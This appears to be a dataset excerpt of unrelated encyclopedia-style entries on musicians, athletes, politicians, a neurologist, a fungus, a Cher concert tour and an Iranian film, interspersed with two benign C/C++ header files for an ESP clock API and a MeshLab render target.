text stringlengths 1 22.8M |
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Erik Balke (born 7 November 1953) is a Norwegian jazz musician (saxophone), known as leader of the "Lille Frøen Saksofonkvartett" with Vidar Johansen, Arne Frang and Odd Riisnæs/Tore Brunborg/Olav Dale, as member of his younger brother Jon Balke's early orchestras, and for cooperations with Don Cherry, Ed Blackwell, Per Jørgensen, Audun Kleive, Nils Petter Molvær, Torbjørn Sunde, Tore Brunborg, Paolo Vinaccia, and Bugge Wesseltoft.
Career
Balke was born in Oslo. In 1973–94 he worked with his brother, Jon Balke. He studied at the University of Oslo, where he was a member of the big band, and at Berklee School of Music in Boston (1977–79).
He played with the Carl Morten Iversen Trio (1980–81), the Gambian/Norwegian Friendship Orchestra (1982), with Miki N'Doye in E'Olen and Tamma (Finn Sletten, Miki N'Doye, Per Jørgensen & Sveinung Hovensjø), and established Lille Frøen Saksofonkvartett (1979–89), played with Jazzpunkensemblet (1983–), Oslo 13 og Extended Noise (1983–94). He also chaired the Foreningen norske jazzmusikere before he moved to Berlin. Back in Norway, he participated in Baktruppen and Ignore. He and Jon Balke composed the commissioned work Palmevinsdrankeren for the Kongsberg Jazz Festival (1984).
Balke was part of the band E'Olen with Jon Balke, Miki N'doye (percussion), Sveinung Hovensjø (bass), Finn Sletten (drums), and Zakhir Helge Linaae (percussion).
Discography
E'Olen (Mai, 1979), with E'Olen
Tamma (Odin, 1985), Tamma with Don Cherry & Ed Blackwell
4 menn (Odin, 1986), with Lille Frøen Saksofonkvartett
Off Balance (Odin, 1988), with Oslo 13
Joko with Miki N'Doye Orchestra feat. Paolo Vinaccia, Bugge Wesseltoft, Solo Cissokho & Jon Balke (2002)
References
External links
Erik Balke Biography – Norsk jazzarkiv JazzBasen.no
Lille Frøen Saxophone Quartet – Kanal 1 10.01.1986 on NRK
20th-century Norwegian saxophonists
21st-century Norwegian saxophonists
Norwegian jazz saxophonists
Norwegian jazz composers
ECM Records artists
1953 births
Living people
Musicians from Oslo
1300 Oslo members
Extended Noise members
Jazzpunkensemblet members |
Boyd Franklin "Cotton" Converse (February 18, 1932 – May 31, 2010) was an American football coach and college administrator. He served as the head football coach at Wichita State University for one season in 1967, compiling a record of 2–7–1. From 1964 to 1966 he was the head football coach at Kilgore College, where he led his team to the NJCAA National Football Championship in 1966. Converse died in 2010 after a long illness.
Head coaching record
College
References
1932 births
2010 deaths
Wichita State Shockers football coaches
Junior college football coaches in the United States
People from Johnston County, Oklahoma |
Giuseppe Montello (born 7 December 1992) is an Italian biathlete. He competed in the 2018 Winter Olympics.
Biathlon results
All results are sourced from the International Biathlon Union.
Olympic Games
0 medals
*The mixed relay was added as an event in 2014.
World Championships
0 medals
*During Olympic seasons competitions are only held for those events not included in the Olympic program.
**The mixed relay was added as an event in 2005.
References
1992 births
Living people
People from Tolmezzo
Biathletes at the 2018 Winter Olympics
Italian male biathletes
Olympic biathletes for Italy
Sportspeople from Friuli-Venezia Giulia |
The Michael government was formed by Alun Michael following the 1999 National Assembly for Wales election and was a Labour minority government.
Cabinet
References
Welsh governments
Ministries of Elizabeth II |
Sir Gordon Morgan Holmes, (22 February 1876 – 29 December 1965) was an Anglo-Irish neurologist. He is best known for carrying out pioneering research into the cerebellum and the visual cortex.
Education
The son of a County Louth farmer, Holmes was born 40 miles north of Dublin and educated at Dundalk Educational Institution (now Dundalk Grammar School) and Trinity College, Dublin, where he graduated in medicine in 1897.
Career
He was initially employed at Richmond Lunatic Asylum and then, after working his way to New Zealand and back returned to studying neurology in Germany. In 1906 he was appointed Physician to the National Hospital for Nervous Diseases, Queen Square, London.
At the outbreak of the First World War he was appointed as consultant neurologist to the British Expeditionary Forces. Working in a field hospital he had a unique opportunity for the investigation of the effects of lesions in specific regions of the brain on balance, vision and bladder function. While in France, Holmes met his future wife, Dr Rosalie Jobson, an Oxford graduate and an international sportswoman, to whom he subsequently proposed marriage while rowing on the Thames. His wartime observations on gunshot wounds re-awakened his interest in cerebellar disease which led to his classical analysis of the symptoms of cerebellar lesions described in his Croonian Lectures to the Royal College of Physicians in 1922.
He was elected a Fellow of the Royal Society in May 1933 and delivered their Ferrier Lecture in 1944.
He was made CMG in 1917, CBE in 1919 and knighted in 1951.
Biography
Gordon Morgan Holmes' father was a successful farmer at Dellin House, Castlebellingham, County Louth, about 40 miles north of Dublin. The early death of his mother, Kathleen (née Morgan), and his father's remarriage, deeply affected Holmes, and although he had three brothers and three sisters, he was a solitary child. Despite a transient dyslexia, Holmes was a brilliant scholar and after completing his education as a boarder at Dundalk Educational Institution, he entered Trinity College, Dublin, and graduated in medicine in 1897, at the age of 21 years.
Holmes was a resident at the Richmond Asylum, but soon after qualification he worked his passage to New Zealand, serving as ship's surgeon. Holmes then undertook 2 1/2 years postgraduate study in neurology in Germany. Initially he was in Berlin, but he said "it was all spoon feeding" and he went to Frankfurt am Main where he worked at the Senckenberg Institute with Ludwig Edinger (1855–1919) and Carl Weigert (1845–1904).
Edinger suggested that he investigated the experimental model of Friedrich Leopold Goltz (1834–1902), which was a dog who had had its brain extirpated, saying "I can't make anything of it!" It is possible that this experimental animal may have aroused his initial interest in the cerebellum. He said, "I might have become a German" for there was an effort to create a post for him in Frankfurt, but Ehrlich had just commenced his work on Salvarsan and it was decided that the money over the next two years go to that work.
Holmes therefore returned to London and became a resident medical officer at the National Hospital for Nervous Diseases in Queen Square, under John Hughlings Jackson (1835–1911), the doyen of British neurologists. Around this time, he published a paper detailing Holmes tremor and a phenomenon later known as the Holmes rebound phenomenon.
In 1906 Holmes was appointed as director of clinical research at Queen Square, where he commenced collaborating with Henry Head (1861–1940) in 1908. This led to the first accurate account of the functions of the optic thalamus and its relation to the cerebral cortex. The two men complemented one another because Head was imaginative and enthusiastic as well as speculative, whereas Holmes insisted upon attention to detail and would never bend facts to fit a hypothesis. At times this led to clashes between the two, but they continued a close collaboration until the outbreak of the 1st World War.
Holmes retained his urge for adventure and he sought a place on Captain Robert Falcon Scott's (1868–1912) ill-fated expedition to the South Pole. A ruptured Achilles tendon necessitated the abandonment of his plan and Holmes profited from his convalescence by obtaining a higher medical degree. In 1910, having obtained a higher medical degree, Holmes was appointed to the staff of the National Hospital when a senior colleague died suddenly. Thereafter his life revolved around his clinical and teaching activities in this hospital, which were unpaid, and a successful private practice.
Upon the outbreak of World War I Holmes was appointed as consultant neurologist to the British Expeditionary Forces. Working with his neurosurgical colleague Percy Sargent (1873–1933) in a field hospital they had set up, he had a unique opportunity for the investigation of the effects of lesions in specific regions of the brain on balance, vision and bladder function. While in France, Holmes met his future wife, Dr Rosalie Jobson, an Oxford graduate and an international sportswoman, to whom he subsequently proposed marriage while rowing on the Thames.
Holmes' observations on gunshot wounds re-awakened his interest in cerebellar disease; this culminated in his classical analysis of the symptoms of cerebellar lesions which were published in his Croonian Lectures to the Royal College of Physicians in 1922, where he added more cases of gunshot wounds to his 1st World War experience as well as patients with cerebellar tumours.
When Holmes returned to the staff of the Charing Cross Hospital after World War I, he was joined by William Adie, a young Australian who became his friend. Holmes and Adie shared interests in neurology and neuroanatomy, and in 1941 they published separate papers on the condition which now bear their conjoined eponym. It seems probable that they had entered into extensive discussion of the disorder which they had documented.
In the period between the wars, Holmes had concurrent appointments at Queen Square, Moorfields Eye Hospital and the Charing Cross Hospital. He was an exceptional teacher of clinical neurology and his weekly case discussions at Queen Square attracted numerous postgraduates.
Holmes disliked medical politics and when forced to be on committees was said to vary between someone who was overwhelmingly bored to being forceful and bullying! He introduced to England the painstaking physical examination of a neurologist and even outstripped Gowers in his systematic collection of clinical data and its correlation with anatomy and pathology.
He investigated amyotonia congenita with James Stanfield Collier (1870–1935) (Brain, London, 1909, 32: 269–284) and described the first removal of a suprarenal tumour (by Percy Sargent) reversing virilism in the patient. He was editor of the journal Brain for many years and was well known for aiding young neurologists by going over their manuscripts and ruthlessly abbreviating and improving the English.
Bibliography
Studies in Neurology, 2 volumes. London, H. Frowde, Hodder & Stoughton, 1920 with William Halse Rivers (1864–1922), G. Holmes, James Sherren, Harold Theodore Thompson (1878–1935), George Riddoch (1888–1947):
G. Holmes, The National Hospital, Queen Square, 1860–1948. Edinburgh & London, E & S Livingstone Ltd., 1954
References
External links
1876 births
1965 deaths
People from Castlebellingham
Alumni of Trinity College Dublin
British neurologists
Commanders of the Order of the British Empire
Companions of the Order of St Michael and St George
Fellows of the Royal Society
Knights Bachelor |
```objective-c
/*
*
*/
#pragma once
#include "esp_err.h"
#include "soc/clk_tree_defs.h"
#ifdef __cplusplus
extern "C" {
#endif
/**
* @brief Degree of precision of frequency value to be returned by esp_clk_tree_src_get_freq_hz()
*/
typedef enum {
ESP_CLK_TREE_SRC_FREQ_PRECISION_CACHED, /*< Get value from the data cached by the driver; If the data is 0, then a calibration will be performed */
ESP_CLK_TREE_SRC_FREQ_PRECISION_APPROX, /*< Get its approxiamte frequency value */
ESP_CLK_TREE_SRC_FREQ_PRECISION_EXACT, /*< Always perform a calibration */
ESP_CLK_TREE_SRC_FREQ_PRECISION_INVALID, /*< Invalid degree of precision */
} esp_clk_tree_src_freq_precision_t;
/**
* @brief Get frequency of module clock source
*
* @param[in] clk_src Clock source available to modules, in soc_module_clk_t
* @param[in] precision Degree of precision, one of esp_clk_tree_src_freq_precision_t values
* This arg only applies to the clock sources that their frequencies can vary:
* SOC_MOD_CLK_RTC_FAST, SOC_MOD_CLK_RTC_SLOW, SOC_MOD_CLK_RC_FAST, SOC_MOD_CLK_RC_FAST_D256,
* SOC_MOD_CLK_XTAL32K
* For other clock sources, this field is ignored.
* @param[out] freq_value Frequency of the clock source, in Hz
*
* @return
* - ESP_OK Success
* - ESP_ERR_INVALID_ARG Parameter error
* - ESP_FAIL Calibration failed
*/
esp_err_t esp_clk_tree_src_get_freq_hz(soc_module_clk_t clk_src, esp_clk_tree_src_freq_precision_t precision,
uint32_t *freq_value);
#ifdef __cplusplus
}
#endif
``` |
Jacob (Jake) Shulz (October 12, 1901 – August 14, 1983) was a Canadian farmer and politician as well as the father-in-law of Governor General Ed Schreyer.
Shulz was born in Friedensthal, a Bessarabia German community in the Russian Empire, from 1918 part of Romania and today Mirnopolye, Ukraine. He came to Canada with his wife in 1930 to become a farmer in the Gilbert Plains area of Manitoba. He joined the co-operative movement and became involved in municipal politics.
He was a candidate for the Manitoba Co-operative Commonwealth Federation in the 1949 provincial election losing by 300 votes to Ray Mitchell.
In 1950, Schulz became founding president of the Manitoba Farmers Union and served as chairman of the Interprovincial Farm Union Council in the mid-1950s. He was elected to Parliament in the 1957 general election representing Springfield for the Co-operative Commonwealth Federation. He only served for a year before losing his seat in the 1958 federal election that elected a landslide majority government for the Progressive Conservative Party of Canada.
Shulz founded a construction company in 1960 and wrote a book, The Rise and Fall of Farm Organizations.
His daughter, Lily is to married Ed Schreyer who, in the 1965 federal election, was elected a CCF MP from Schulz' old riding of Springfield.
References
External links
1901 births
1983 deaths
Co-operative Commonwealth Federation MPs
20th-century Canadian politicians
Bessarabia-German people
Canadian people of German descent
Farmers from Manitoba
Romanian emigrants to Canada
Members of the House of Commons of Canada from Manitoba |
The 1991 Tour de France was the 78th edition of Tour de France, one of cycling's Grand Tours. The Tour began in Lyon with a prologue individual time trial on 6 July and Stage 12 occurred on 18 July with a mountainous stage from Pau. The race finished on the Champs-Élysées in Paris on 28 July.
Stage 12
18 July 1991 — Pau to Jaca (Spain),
Stage 13
19 July 1991 — Jaca (Spain) to Val-Louron,
Stage 14
20 July 1991 — Saint-Gaudens to Castres,
Stage 15
21 July 1991 — Albi to Alès,
Stage 16
22 July 1991 — Alès to Gap,
Stage 17
23 July 1991 — Gap to Alpe d'Huez,
Stage 18
24 July 1991 — Le Bourg-d'Oisans to Morzine,
Stage 19
25 July 1991 — Morzine to Aix-les-Bains,
Stage 20
26 July 1991 — Aix-les-Bains to Mâcon,
Stage 21
27 July 1991 — Lugny to Mâcon, (ITT)
Stage 22
28 July 1991 — Melun to Paris Champs-Élysées,
References
1991 Tour de France
Tour de France stages |
Tengizbay is a mountain pass at the border of Batken Region and Osh Region of Kyrgyzstan. Its elevation is . It connects the village Daroot-Korgon in the Alay Valley with the city Kyzyl-Kiya in the Fergana Valley.
References
External links
Satellite map at Maplandia.com
Batken Region
Osh Region
Mountain passes of Kyrgyzstan |
Corticium roseum is a species of fungus in the family Corticiaceae. Basidiocarps (fruit bodies) are effused, smooth, corticioid, and pink. The species has a wide, north and south temperate distribution and in Europe is typically found on dead, attached branches of Salix and Populus.
Taxonomy
Corticium roseum was originally described by Persoon in 1794 as part of his new genus Corticium. It was later selected as the type species of the genus. Morphological differences between collections indicated that C. roseum might be a species complex and several new species were described. Molecular research, based on cladistic analysis of DNA sequences, has partly confirmed this. Corticium boreoroseum, C. medioroseum, and C. malagasoroseum are separate species, based on DNA evidence, whilst C. erikssonii and C. lombardiae are synonyms of C. roseum.
References
Fungi described in 1794
Corticiales
Taxa named by Christiaan Hendrik Persoon |
Polwarth, Ripon, Hampden and South Grenville was an electoral district of the Legislative Assembly in the Australian state of Victoria from 1856 to 1859. It was based in western Victoria.
The district of Polwarth, Ripon, Hampden and South Grenville was one of the initial districts of the first Victorian Legislative Assembly, 1856.
In 1859 "Polwarth, Ripon, Hampden and South Grenville" was abolished and new districts of "Grenville" (two members), "Ripon and Hampden" (one member) and "Polwarth and South Grenville" (one member) were created due to the increase of numbers in the Victorian Legislative Assembly.
Members for Polwarth, Ripon, Hampden and South Grenville
Campbell later represented Crowlands from May 1874 to April 1877.
References
Former electoral districts of Victoria (state)
1856 establishments in Australia
1859 disestablishments in Australia |
Robert Cummings (June 16, 1833 – January 16, 1910) was a Canadian manufacturer and community leader.
He was born in Gloucester Township, Ontario to a family of Irish immigrants in 1833. He learned the trade of carriage making and became a leading Canadian manufacturer. He opened a general store and operated a flour mill on Cummings Island in the Rideau River which became the nucleus of a new community, Janeville, which eventually became part of Vanier. He served ten years as reeve in the township, was also a Justice of the Peace and was elected warden for Carleton County in 1876. Cummings was also a captain in the local militia. He married Agnes Borthwick (1840–1921).
The Cummings Bridge across the Rideau River was named after him.
References
Carleton Saga, Harry & Olive Walker (1968)
Historical Sketch of the County of Carleton (1971) - originally published in 1879, reprinted by Mika Press, Belleville, Ontario
1833 births
1910 deaths
Mayors and reeves of Gloucester Township, Ontario
Canadian people of Irish descent |
```objective-c
/****************************************************************************
* MeshLab o o *
* A versatile mesh processing toolbox o o *
* _ O _ *
* Visual Computing Lab /\/| *
* ISTI - Italian National Research Council | *
* \ *
* All rights reserved. *
* *
* This program is free software; you can redistribute it and/or modify *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* for more details. *
* *
****************************************************************************/
#ifndef RFX_RENDERTARGET_H_
#define RFX_RENDERTARGET_H_
#include <cassert>
#include <QString>
#include <QMap>
#include <QImage>
#include <GL/glew.h>
#include "rfx_state.h"
class RfxRenderTarget
{
public:
RfxRenderTarget(const QString&);
virtual ~RfxRenderTarget();
void SetSize(int w, int h) { width = w; height = h; }
void SetClear(int pass, float depthClear, float *colorClear);
void AddGLState(int p, RfxState *s) { passStates[p].append(s); }
const QString& GetName() { return name; }
GLuint GetTexture() { return colTex; }
QImage GetQImage();
bool Setup(int pass);
void Bind(int pass);
void Unbind();
void UseViewPortDim(bool useVD) { vportdim = useVD; }
void GenMipmaps(bool genMip) { mipmaps = genMip; }
private:
GLuint fbo;
GLuint colTex;
GLuint depTex;
QString name;
int width;
int height;
bool mipmaps;
bool vportdim;
bool initOk;
struct RTOptions {
GLint clearMask;
bool depthClear;
float depthClearVal;
bool colorClear;
float colorClearVal[4];
};
QMap<int, RTOptions> passOptions;
QMap<int, QList<RfxState*> > passStates;
};
#endif /* RFX_RENDERTARGET_H_ */
``` |
was a Japanese diplomat and politician. He was born in Osaka, graduated from the Tokyo Higher Commercial School (東京高等商業学校, Tōkyō Kōtō Shōgyō Gakkō, now Hitotsubashi University) in 1904, attended the consul course of the same institute, and finished studying there in 1905.
Biography
He was born on October 30, 1882, in Osaka.
He was an active politician and diplomat. In 1905, he passed the Foreign Service exam and started to work at the Ministry of Foreign Affairs. After serving as Mukden Consul General and executive secretary of the London Naval Treaty, he served as Imperial Japan's Ambassador to Belgium in 1930 and to France in 1933. He became Minister of Foreign Affairs (Senjūrō Hayashi Cabinet) in March 1937, and resigned in June 1937, then was assigned as Diplomatic Adviser, Ministry of Foreign Affairs, under 1st Fumimaro Konoye Cabinet and Hideki Tojo Cabinet.
He served from 1942 as the last Imperial Japanese Ambassador to the U.S.S.R. before the Soviet invasion of Manchuria, upon the request of the Minister of Foreign Affairs, Shigenori Tōgō. As Minister, he worked hard to avert war at the Imperial Diet. one of his missions as Japan's Ambassador to the U.S.S.R. was to seek peace with the Allies through the assistance of the U.S.S.R. due to Soviet–Japanese Neutrality Pact.
However, Satō judged and reported to Tokyo that it was unlikely that the U.S.S.R. would assist Imperial Japan, because it was highly likely that Japan would lose the war, and urged an end to the war as early as possible. On August 8, 1945, he was invited to the Kremlin by the U.S.S.R. Foreign Minister, Vyacheslav Molotov, and received the Soviet declaration of war against Imperial Japan. After the war, he was elected to the House of Councillors of the National Diet of Japan in 1947, and served as a President of the House of Councillors from 1949 to 1953.
He died on December 18, 1971, in Tokyo.
References
1882 births
1971 deaths
Politicians from Osaka Prefecture
Members of the House of Councillors (Japan)
Foreign ministers of Japan
Ambassadors of Japan to the Soviet Union
Hitotsubashi University alumni
Recipients of the Order of the Sacred Treasure, 1st class
Grand Cordons of the Order of the Rising Sun
Recipients of the Order of the Rising Sun with Paulownia Flowers
Ambassadors of Japan to Belgium
Ambassadors of Japan to France
Presidents of the House of Councillors (Japan) |
Leucolophus is a genus of flowering plants belonging to the family Rubiaceae.
Its native range is Western Malesia.
Species:
Leucolophus gajoensis
Leucolophus macranthus
Leucolophus tobingensis
References
Rubiaceae
Rubiaceae genera |
Sparassol is an antibiotic and antifungal isolated from Sparassis crispa.
External links
Two new antifungal metabolites produced by Sparassis crispa in culture and in decayed trees
Antibiotics
Antifungals |
Charles Beckett may refer to:
Charles Beckett (cricketer) (1794–1838), English cricketer
Charles Beckett (politician) (born 1958), American politician in the Mississippi House of Representatives
Charles Edward Beckett (1849–1925), brigadier-general and cavalry officer in the British Army |
Asha Solette Philip (born 25 October 1990) is an English sprinter and former junior gymnast specialising in double mini-trampoline. She was the first British woman to achieve a global 100 metres title at any age-group, winning gold at the 2007 World Youth Championships aged 16. Following a serious knee injury in gymnastics, and a rehabilitation period of several years, she returned to athletics full-time in 2014, winning gold at the European Athletics Championships in the 4 x 100 metres relay for Great Britain, and bronze in the same event at the Commonwealth Games for England.
She won her first senior individual title in 2017, claiming gold at the 2017 European Athletics Indoor Championships 60 metres for women, and with Dina Asher-Smith, Desiree Henry and Daryll Neita formed part of the Great Britain 4 × 100 m relay squad which won an Olympic bronze medal in the 4 x 100 metres relay at the 2016 Rio Games. She also won silver medals in the same event at the 2017 and 2019 World Championships. A noted fast starter and 60 metre sprinter, Philip generally runs the first leg on relay duty.
Career
Philip had competed in double mini trampoline since aged 4. She was a World Junior Champion on double mini-trampoline, winning gold in the junior (15–16 years old) girls category in the world age competition in Eindhoven, Netherlands.
In July 2007, Philip won the World Youth Athletics Championships gold in the 100 metres, but shortly afterwards suffered a serious cruciate ligament injury representing Great Britain in the double-mini team event at the senior Trampoline World Championships in Quebec, Canada, which halted her sporting career entirely for three years. This ruled her out of a chance at selection for the 2008 Summer Olympics in Beijing, China.
On her return from injury, Philip completed solely in athletics, and was part of the Great Britain teams that won a silver medal in the 4 x 200 metres relay at the 2014 IAAF World Relays, and a gold medal in the 4 x 100 metres relay at the 2014 European Championships. In the same year, representing England, she won a bronze medal in the 4 x 100 metres relay and finished fourth in the 100 metres final at the 2014 Commonwealth Games.
In 2016, she competed at the Olympic Games in Rio. Philip reached the semi-finals of the 100 metres, but did not qualify for the finals. Philip then went on to win a bronze medal in the 4 x 100 metres relay, along with teammates Desiree Henry, Dina Asher-Smith and Daryll Neita. The quartet set a new British record with a time of 41.77 seconds.
Personal life
Born in Leyton, East London to an Antiguan father and a Jamaican mother, Philip attended Connaught School for Girls in Leytonstone. She graduated from Kingston University in 2012, with a BA (Hons) degree in drama.
References
External links
Living people
1990 births
People from Leyton
Sportspeople from the London Borough of Waltham Forest
Athletes from London
British female trampolinists
English female sprinters
British female sprinters
Olympic female sprinters
Olympic athletes for Great Britain
Olympic bronze medallists for Great Britain
Olympic bronze medalists in athletics (track and field)
Athletes (track and field) at the 2016 Summer Olympics
Medalists at the 2016 Summer Olympics
Commonwealth Games gold medallists for England
Commonwealth Games bronze medallists for England
Commonwealth Games gold medallists in athletics
Commonwealth Games medallists in athletics
Athletes (track and field) at the 2014 Commonwealth Games
Athletes (track and field) at the 2018 Commonwealth Games
World Athletics Championships athletes for Great Britain
World Athletics Championships medalists
World Youth Championships in Athletics winners
European Athletics Championships winners
European Athletics Championships medalists
European Athletics Indoor Championships winners
British Athletics Championships winners
Alumni of Kingston University
Black British sportswomen
English people of Antigua and Barbuda descent
English people of Jamaican descent
Athletes (track and field) at the 2020 Summer Olympics
Medalists at the 2020 Summer Olympics
Athletes (track and field) at the 2022 Commonwealth Games
Medallists at the 2022 Commonwealth Games |
Johnny Mathis (born 1935) is an American pop music singer.
John or Johnny Mathis may refer to:
"Country" Johnny Mathis (1930–2011), American country music singer and songwriter
John Mathis, American politician from Utah
John Mathis (1942–2023), American soul singer who performed as Johnny Johnson for Johnny Johnson and the Bandwagon
Johnny Mathis (basketball) (1943–2023), American basketball player
See also
John H. Mathis & Company, a shipbuilding company based in Camden, New Jersey |
A linked numbering scheme (LNS) is a dialing procedure in effect in a service area within which call routing between adjacent exchanges does not require a dialing code. The term is only used in the United Kingdom, but not in the North American Numbering Plan.
United Kingdom
The largest linked numbering scheme in the UK is that for the London telephone area, formerly known as the London Director area. Within the area, several million subscribers can call each other by dialing a uniform code. For example, anyone calling from an (020) number can reach Transport for London travel enquiries by dialing 7222 1234.
Smaller schemes apply outside London. Uxbridge, for example, has the subscriber trunk dialing (STD) code 01895. Uxbridge exchange is the parent for Denham, Harefield, Ruislip and West Drayton; anyone connected to any of those exchanges can call any of the others without having to prefix the number with 01895. This is achieved by giving subscriber lines on each exchange different prefix numbers, thus: all numbers are six-figure; Denham numbers start with 83, Harefield with 82, Ruislip with 6 and West Drayton with 4. Uxbridge numbers start with 2 or 81. All calls must have all six digits dialled - even if a subscriber is on Denham exchange and is calling another subscriber on Denham exchange, they must still dial 83xxxx.
Incoming calls from any other exchange for a subscriber on any of the five exchanges must all be prefixed with the same 01895 code.
North America
The terminology linked numbering scheme is not used in the North American Numbering Plan (NANP).
A local call in this scheme, standardized in 1948 for the introduction of direct-dial long-distance calling, was originally dialled as a fixed-length seven-digit number and did not require an area code. In some cases, a local call to a number just across an area code boundary could be seven digits if an exchange code protection scheme prevented the same prefixes being assigned to local numbers in the other area code.
A long-distance trunk call within the same area code used to be dialable as 1 followed by seven digits, without the area code. This no longer possible everywhere in the NANP by 1995. In areas using toll alerting, where long-distance calls are identified by a trunk prefix (a leading 1-) to be distinguishable from flat-rate local calls, all toll calls must be dialled with the area code.
Some local calls require ten-digit dialling, either across area code boundaries in a split plan or within the same community in an overlay plan. This may mean that no standard numbers are reachable without dialling an area code in some localities.
References
Telephone numbers |
The Here We Go Again Tour was the seventh solo concert tour by American singer-actress Cher in support of her twenty-sixth studio album Dancing Queen. This was the first time the singer had embarked on a world tour since her Living Proof: The Farewell Tour (2002–2005). The tour started on September 21, 2018, and was forced to conclude on March 10, 2020, due to the COVID-19 pandemic.
Background
On May 7, 2018, it was announced via various media outlets that Cher would embark on her first Australian solo tour in more than a decade and her seventh solo concert tour overall. On May 17, 2018, it was announced that Cher would add two more dates in Melbourne and Sydney due to "overwhelming demand". On June 27, 2018, it was announced that Cher will visit New Zealand for a concert before continuing the tour in Australia. A second concert in New Zealand was announced shortly after. On September 3, 2018, it was announced that Cher would "farewell Melbourne" for a "third and final show" on October 6, 2018, due to high demand. Later that same week, it was announced that Cher will take the Here We Go Again Tour to North America for 34 dates. The second leg of the tour started on January 17, 2019, in Florida and ended on May 30, 2019, in Vancouver.
On December 11, 2018, it was announced that Cher would tour Europe for the first time in 15 years. The European leg of the tour started on September 26, 2019, in Berlin, Germany and finished on November 3, 2019, in Belfast, Northern Ireland.
Following this, Cher announced new tour dates in North America, beginning in Portland, Oregon on November 19, 2019. On March 12, 2020, Cher announced her spring tour dates would be postponed to the fall, amid the ongoing coronavirus pandemic, with the exception of Birmingham, Alabama, which was cancelled, due to planned renovations at the Legacy Arena during the rescheduled run. However, due to the persistence of the pandemic in the United States, the rescheduled dates were all canceled.
Concert synopsis
A giant curtain is set up where, during the start of the concert, a video montage featuring many moments of Cher's career is projected onto it. After the intro ends and the curtain drops, Cher appears wearing a purple toga and a blue wig, while standing on a bedazzled arched lift performing "Woman's World". The song is followed by "Strong Enough" and a 15-minute on stage monologue where she infamously asks the crowd "what's your granny doing tonight?" She leaves for a costume change, while the "Gayatri Mantra" is played. She returns on a mechanical elephant lip syncing the last part, and then she gets off the elephant and she performs "All or Nothing". The next act is started with a video interlude of Cher and her late ex-husband, Sonny Bono, singing a medley of "Little Man" and "All I Ever Need is You". She starts performing "The Beat Goes On" followed by a brief speech where Cher talks about how she rarely performs the song "I Got You Babe" live with Bono joining her via a large-screen video monitor.
A video interlude of Cher performing "You Haven't Seen the Last of Me" follows and the next act starts with her dancers performing a Burlesque-inspired dance routine. Finally, Cher enters the stage in a Burlesque inspired outfit and sings "Welcome to Burlesque", followed by a costume change, with "Lie to Me" acrobatic interlude. She and her dancers reappear in 70's inspired clothes as she sings her covers of ABBA's "Waterloo" and "SOS". Cher then goes to an elevated platform and sings "Fernando", accompanied by a backdrop of fireworks.
After a video montage of her career highlights as an actress, the next act sees Cher performing "After All". An interlude of "Heartbreak Hotel" plays as Cher changes costumes and sings "Walking In Memphis", which she dedicated to the first time she saw Elvis in concert. "The Shoop Shoop Song (It's in His Kiss)" ends the act, and a guitar solo of "Bang Bang (My Baby Shot Me Down)" plays as a final intermission. Cher, in a black see-through bodysuit, appears to close the main set with performances of "I Found Someone" and "If I Could Turn Back Time". She leaves, and after a minute, returns to close the show with an encore performance of "Believe".
Commercial reception
Cher, with the Here We Go Again Tour, was the third top-grossing female touring artist of 2019 and ranked at number 11 on Billboard's Year End Top 40 Tours. Pollstar's Year End Top 100 Tours chart ranked Cher at number 20. In 2019, Cher became the first female artist in history with the age of over 70 to gross over $100 million in one concert tour.
Critical reception
The tour has received mostly positive reception from critics, praising Cher's vocals as well as the elements of the show and the costume changes. The European leg of the tour gained critical acclaim praising Cher's energy, performances, and humor. The tour was nominated for a People's Choice Award in the "Favorite Concert Tour of 2019" category.
Set list
The following set list is from the concert on January 17 in Estero, Florida. It does not represent all shows.
"Woman's World"
"Strong Enough"
"Gayatri Mantra"
"All or Nothing"
"All I Ever Need Is You" / "Little Man"
"The Beat Goes On"
"I Got You Babe"
"You Haven't Seen the Last of Me"
"Welcome to Burlesque"
"Lie To Me"
"Waterloo"
"SOS"
"Fernando"
"After All"
"Heartbreak Hotel"
"Walking in Memphis"
"The Shoop Shoop Song (It's in His Kiss)"
"Bang Bang"
"I Found Someone"
"If I Could Turn Back Time"
Encore
"Believe"
Shows
Cancelled shows
Notes
Personnel
Adapted from the Here We Go Again Tour program credits.
Cher – lead vocals
Nick Cua – tour director
Ollie Marland – musical director
Bob Mackie – costume designer
Band
Ollie Marland and Darrell Smith – keyboards
Joel Hoekstra / Ben Mauro – guitar
Ashley Reeves – bass
Jason Sutter – drums
Jodi Katz – background vocals
Nikki Tillman – background vocals
Jenny Douglas-Foote – background vocals
Dancers
Ferly Prado – dancer
Marlon Pelayo – dancer
Daniel Dory – dancer
Melanie Lewis-Yribar – dancer
Jamal Story – dancer
Ben Bigler – dancer
Britta Grant – dancer
Bailey Swift – dancer
Sumayah McRae – dancer
SheilaJoy Burford – dancer
Dujuan Smart Jr. – dancer
Ryan Ramírez – dancer
References
2018 concert tours
2019 concert tours
2020 concert tours
Cher concert tours
Concert tours of Australia
Concert tours cancelled due to the COVID-19 pandemic |
Walkabout is the third studio album by Najwa Nimri, released in 2006.
Track listing
"I'll Wait For Us" – 5:20
"So Often" – 4:48
"Just in Case" – 3:42
"Capable" – 3:29
"Push It" – 3:36
"Le tien, le mien" – 4:28
"I Like It" – 4:59
"Sexy Light" – 3:51
"One of Those Days" – 3:48
"Being Safe" – 3:35
Singles
"Capable" – January 23, 2006
"Push It"
"Le Tien, Le Mien"
2006 albums |
Bashu, the Little Stranger (), is a 1986 Iranian drama film directed by Bahram Beizai. The film was produced in 1986, and was released in 1989. This multi-ethnic film was the first Iranian film to make use Gilaki, a northern language of Iran, in a serious context rather than comic relief. Susan Taslimi playing the main character, Naii, is a Gilak herself. The cast included Farrokhlagha Houshmand (playing the sister in law).
The Institute for Intellectual Development of Children and Young Adults (IIDCYA) helped produce the film.,Bashu, the Little Stranger was voted the "Best Iranian Film of all time" in November 1999 by a Persian movie magazine "Picture world" poll of 150 Iranian critics and professionals. The 2004 Malayalam movie Kaazhcha was reported to be inspired by this movie.
Plot
